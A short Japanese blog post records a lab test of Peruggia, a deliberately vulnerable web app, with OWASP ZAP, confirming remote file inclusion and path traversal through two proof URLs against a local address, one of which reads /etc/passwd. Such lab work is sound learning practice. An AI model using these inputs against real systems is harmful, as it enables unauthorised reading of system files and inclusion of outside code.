Shikata Ga Nai

Private? There is no such things.

Peruggiaで検出された危険度高の脆弱性について確認してみた

Hello there, ('ω')ノ

 

PeruggiaをOWASP ZAPでアクティブスキャンして。

SQLiとXSS以外で危険度の高い脆弱性について検証してみることに。

ZAPでもBurp Suiteで検出されたリモートファイルインクルージョンを発見して。

 

f:id:ThisIsOne:20200804120030p:plain

 

下記のURLを入力すると確認できて。

http://192.168.1.82/peruggia/index.php?action=learn&paper=http%3A%2F%2Fwww.google.com%2F&type=BoF

 

f:id:ThisIsOne:20200804115940p:plain

 

もう一つ、パストラバーサルも検出できたようで。

 

f:id:ThisIsOne:20200804115524p:plain

 

こちらも下記のURLを入力して確認して。

http://192.168.1.82/peruggia/index.php?action=learn&paper=%2Fetc%2Fpasswd&type=BoF

 

f:id:ThisIsOne:20200804115402p:plain

 

Best regards, (^^ゞ